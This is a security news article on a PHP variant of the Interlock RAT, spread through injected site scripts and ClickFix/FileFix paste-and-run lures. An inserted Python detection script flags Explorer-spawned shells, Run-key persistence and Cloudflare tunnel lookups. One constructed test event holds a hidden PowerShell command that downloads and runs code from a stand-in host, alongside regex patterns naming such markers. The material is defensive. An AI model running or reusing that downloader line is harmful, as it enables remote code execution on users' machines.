New PHP-based Interlock RAT variant targets multiple industries using FileFix delivery mechanism

July 14, 2025Ravi LakshmananMalware/Web Security

The threat actors behind the Interlock ransomware group have unleashed a new PHP variant of their bespoke remote access trojan (RAT) as part of a wide-ranging campaign that uses a ClickFix variant called FileFix.

"Since May 2025, Interlock RAT-related activity has been observed in connection with the LandUpdate808 web-inject threat clusters," The DFIR Report said in a technical analysis published today in collaboration with Proofpoint.

"The campaign begins with a compromised website injected with a single-line script hidden in the page's HTML, often unbeknownst to site owners and visitors."


The JavaScript code uses IP filtering to act as a traffic distribution system (TDS), redirecting selected visitors to a CAPTCHA verification page that employs ClickFix to run a PowerShell script, which in turn leads to the deployment of NodeSnake (aka Interlock RAT).

Interlock's use of NodeSnake was previously documented by Quorum Cyber in January and March 2025 as part of cyber attacks on local government and higher education organizations in the U.K. The malware provides persistent access, system reconnaissance, and remote command execution capabilities.

The malware's name is a reference to its Node.js underpinnings, but the new campaign observed last month has resulted in the distribution of a PHP variant via FileFix. The activity is assessed to be opportunistic in nature, targeting a wide range of industries.

"This updated delivery mechanism has been observed deploying the PHP variant of the Interlock RAT, which in certain cases has led to the deployment of the Node.js variant of the Interlock RAT," the researchers said.

FileFix is an evolution of ClickFix that abuses the address bar of Windows File Explorer: the victim is lured into pasting a copied command into it, and File Explorer executes that command. The technique was first detailed last month as a proof-of-concept (PoC) by security researcher mr.d0x.

Once installed, the RAT performs reconnaissance of the infected host and exfiltrates system information in JSON format. It also checks its own privileges to determine whether it is running as a normal user, an administrator, or SYSTEM, and establishes contact with a remote server to download and run EXE or DLL payloads.


Persistence on the machine is achieved through changes to the Windows Registry, while Remote Desktop Protocol (RDP) is used for lateral movement.

A notable feature of the trojan is its abuse of a Cloudflare Tunnel subdomain to obscure the true location of the command-and-control (C2) server. The malware further embeds hard-coded IP addresses as a fallback mechanism to keep communications intact even if the Cloudflare Tunnel is taken down.
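The three host-side behaviours described above (a ClickFix or FileFix launch, Registry-based persistence, and C2 over a Cloudflare Tunnel hostname) each leave a fairly narrow trace in endpoint telemetry. The following Python script is an added example, not code from the article or from The DFIR Report or Proofpoint: it runs three detection rules over constructed Sysmon-style events. The first flags explorer.exe spawning a command interpreter with download, hidden-window or encoded-command markers, which is the process tree both ClickFix (Run dialog) and FileFix (File Explorer address bar) produce. The second flags writes under a CurrentVersion\Run key, and the third flags DNS lookups of Cloudflare quick-tunnel hostnames. All events, registry value names, hostnames and the php.exe path are constructed for illustration; that quick tunnels receive a *.trycloudflare.com hostname is an assumption stated in the code, and a named tunnel under an operator-controlled domain would not be caught by that rule.

```python
"""
Triage of constructed Sysmon-style events for three behaviours: a shell
spawned by explorer.exe (ClickFix / FileFix), Run-key persistence, and DNS
lookups of Cloudflare quick-tunnel hostnames.

Every event below is constructed for this example. None of the values are
indicators from the Interlock campaign.
"""
import re
from typing import Callable, Dict, List, Tuple

# Constructed sample events using Sysmon-like field names.
EVENTS: List[Dict[str, str]] = [
    # Benign: user opened Notepad from Explorer.
    {"id": "1", "type": "ProcessCreate",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe C:\\Users\\alice\\notes.txt"},
    # ClickFix / FileFix shape: Explorer launching a hidden PowerShell downloader.
    {"id": "2", "type": "ProcessCreate",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -c \"iex (iwr 'http://example.invalid/x')\""},
    # Benign: admin running PowerShell from a terminal.
    {"id": "3", "type": "ProcessCreate",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Process"},
    # Run-key write by a PHP interpreter. Assumption: the PHP variant runs
    # under php.exe; the value name "Updater" is constructed.
    {"id": "4", "type": "RegistryValueSet",
     "Image": r"C:\Users\alice\AppData\Roaming\php\php.exe",
     "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    # Unrelated registry write from Explorer.
    {"id": "5", "type": "RegistryValueSet",
     "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"},
    # DNS lookup of a constructed quick-tunnel hostname.
    {"id": "6", "type": "DnsQuery",
     "Image": r"C:\Users\alice\AppData\Roaming\php\php.exe",
     "QueryName": "random-words-example.trycloudflare.com"},
    # Benign lookup of Cloudflare's own site.
    {"id": "7", "type": "DnsQuery",
     "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "QueryName": "www.cloudflare.com"},
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Markers typical of paste-and-run lures: hidden window, encoded command, in-memory download.
SUSPICIOUS_ARGS = re.compile(
    r"(?i)(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|\biex\b|invoke-expression"
    r"|downloadstring|\biwr\b|invoke-webrequest)")
RUN_KEY = re.compile(r"(?i)\\CurrentVersion\\(Run|RunOnce)\\")
# Assumption: tunnels created with `cloudflared tunnel --url` get a
# *.trycloudflare.com hostname. Named tunnels use the operator's own domain.
TUNNEL_SUFFIX = ".trycloudflare.com"


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def is_explorer_shell_launch(ev: Dict[str, str]) -> bool:
    """explorer.exe (Run dialog or File Explorer address bar) spawning a shell."""
    if ev.get("type") != "ProcessCreate":
        return False
    if _basename(ev.get("ParentImage", "")) != "explorer.exe":
        return False
    if _basename(ev.get("Image", "")) not in SHELLS:
        return False
    # Explorer also launches shells via shortcuts, so require lure-style
    # arguments to keep the rule from firing on every scripted shortcut.
    return bool(SUSPICIOUS_ARGS.search(ev.get("CommandLine", "")))


def is_run_key_persistence(ev: Dict[str, str]) -> bool:
    """Value written under HK*\\...\\CurrentVersion\\Run or RunOnce."""
    return ev.get("type") == "RegistryValueSet" and bool(RUN_KEY.search(ev.get("TargetObject", "")))


def is_cloudflare_tunnel_lookup(ev: Dict[str, str]) -> bool:
    """DNS query for a Cloudflare quick-tunnel hostname."""
    return ev.get("type") == "DnsQuery" and ev.get("QueryName", "").lower().endswith(TUNNEL_SUFFIX)


RULES: List[Tuple[str, Callable[[Dict[str, str]], bool]]] = [
    ("explorer_spawns_shell", is_explorer_shell_launch),
    ("run_key_persistence", is_run_key_persistence),
    ("cloudflare_tunnel_dns", is_cloudflare_tunnel_lookup),
]


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule name, event id) for every event that matches a rule."""
    return [(name, ev["id"]) for ev in events for name, rule in RULES if rule(ev)]


if __name__ == "__main__":
    for name, eid in triage(EVENTS):
        print(f"{name}: event {eid}")
```

On the constructed input the script reports events 2, 4 and 6 and stays quiet on the benign ones. In production the first rule needs tuning per environment (legitimate shortcuts that pass `-WindowStyle Hidden` exist), and the third rule should be paired with the hard-coded fallback addresses from your own sandbox run, since the article notes the malware falls back to raw IPs when the tunnel is gone.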

"The findings highlight the continued evolution of the Interlock group's tooling and the refinement of its operations," the researchers said. "The Interlock RAT was known for its use of Node.js, but this variant utilizes PHP, a popular web scripting language, to gain and maintain access to victim networks."
